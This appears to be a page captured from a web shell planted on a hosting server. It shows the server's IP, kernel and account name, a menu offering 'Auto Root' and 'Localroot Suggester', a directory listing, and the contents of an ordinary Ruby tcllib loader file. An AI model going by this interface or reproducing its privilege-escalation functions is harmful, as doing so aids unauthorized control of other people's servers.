Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.60
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby23 /
lib64 /
ruby /
2.3.0 /
tkextlib /
Delete
Unzip
Name
Size
Permission
Date
Action
ICONS
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
blt
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
bwidget
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
itcl
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
itk
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
iwidgets
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tcllib
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tclx
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tile
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tkDND
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tkHTML
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tkimg
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tktable
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tktrans
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
treectrl
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
trofs
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
vu
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
winico
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
ICONS.rb
312
B
-rw-r--r--
2023-07-26 18:09
SUPPORT_STATUS
6.63
KB
-rw-r--r--
2023-07-26 18:09
blt.rb
4.97
KB
-rw-r--r--
2023-07-26 18:09
bwidget.rb
4.51
KB
-rw-r--r--
2023-07-26 18:09
itcl.rb
321
B
-rw-r--r--
2023-07-26 18:09
itk.rb
317
B
-rw-r--r--
2023-07-26 18:09
iwidgets.rb
4.29
KB
-rw-r--r--
2023-07-26 18:09
pkg_checker.rb
4.25
KB
-rw-r--r--
2023-07-26 18:09
setup.rb
335
B
-rw-r--r--
2023-07-26 18:09
tcllib.rb
2.71
KB
-rw-r--r--
2023-07-26 18:09
tclx.rb
308
B
-rw-r--r--
2023-07-26 18:09
tile.rb
13
KB
-rw-r--r--
2023-07-26 18:09
tkDND.rb
429
B
-rw-r--r--
2023-07-26 18:09
tkHTML.rb
320
B
-rw-r--r--
2023-07-26 18:09
tkimg.rb
678
B
-rw-r--r--
2023-07-26 18:09
tktable.rb
333
B
-rw-r--r--
2023-07-26 18:09
tktrans.rb
346
B
-rw-r--r--
2023-07-26 18:09
treectrl.rb
328
B
-rw-r--r--
2023-07-26 18:09
trofs.rb
315
B
-rw-r--r--
2023-07-26 18:09
version.rb
122
B
-rw-r--r--
2023-07-26 18:09
vu.rb
999
B
-rw-r--r--
2023-07-26 18:09
winico.rb
356
B
-rw-r--r--
2023-07-26 18:09
Save
Rename
# frozen_string_literal: false # # tcllib extension support # by Hidetoshi NAGAI (nagai@ai.kyutech.ac.jp) # require 'tk' # call setup script for general 'tkextlib' libraries require 'tkextlib/setup.rb' # call setup script require 'tkextlib/tcllib/setup.rb' err = '' # package:: autoscroll target = 'tkextlib/tcllib/autoscroll' begin require target rescue => e err << "\n ['" << target << "'] " << e.class.name << ' : ' << e.message end # package:: cursor target = 'tkextlib/tcllib/cursor' begin require target rescue => e err << "\n ['" << target << "'] " << e.class.name << ' : ' << e.message end # package:: style target = 'tkextlib/tcllib/style' begin require target rescue => e err << "\n ['" << target << "'] " << e.class.name << ' : ' << e.message end # autoload module Tk module Tcllib TkComm::TkExtlibAutoloadModule.unshift(self) # package:: autoscroll autoload :Autoscroll, 'tkextlib/tcllib/autoscroll' # package:: ctext autoload :CText, 'tkextlib/tcllib/ctext' # package:: cursor autoload :Cursor, 'tkextlib/tcllib/cursor' # package:: datefield autoload :Datefield, 'tkextlib/tcllib/datefield' autoload :DateField, 'tkextlib/tcllib/datefield' # package:: getstring autoload :GetString_Dialog, 'tkextlib/tcllib/getstring' # package:: history autoload :History, 'tkextlib/tcllib/history' # package:: ico autoload :ICO, 'tkextlib/tcllib/ico' # package:: ipentry autoload :IP_Entry, 'tkextlib/tcllib/ip_entry' autoload :IPEntry, 'tkextlib/tcllib/ip_entry' # package:: khim autoload :KHIM, 'tkextlib/tcllib/khim' # package:: ntext autoload :Ntext, 'tkextlib/tcllib/ntext' # package:: Plotchart autoload :Plotchart, 'tkextlib/tcllib/plotchart' # package:: style autoload :Style, 'tkextlib/tcllib/style' # package:: swaplist autoload :Swaplist_Dialog, 'tkextlib/tcllib/swaplist' # package:: tablelist autoload :Tablelist, 'tkextlib/tcllib/tablelist' autoload :TableList, 'tkextlib/tcllib/tablelist' autoload :Tablelist_Tile, 'tkextlib/tcllib/tablelist_tile' autoload :TableList_Tile, 'tkextlib/tcllib/tablelist_tile' # package:: tkpiechart autoload :Tkpiechart, 'tkextlib/tcllib/tkpiechart' # package:: tooltip autoload :Tooltip, 'tkextlib/tcllib/tooltip' # package:: widget autoload :Widget, 'tkextlib/tcllib/widget' end end if $VERBOSE && !err.empty? warn("Warning: some sub-packages are failed to require : " + err) end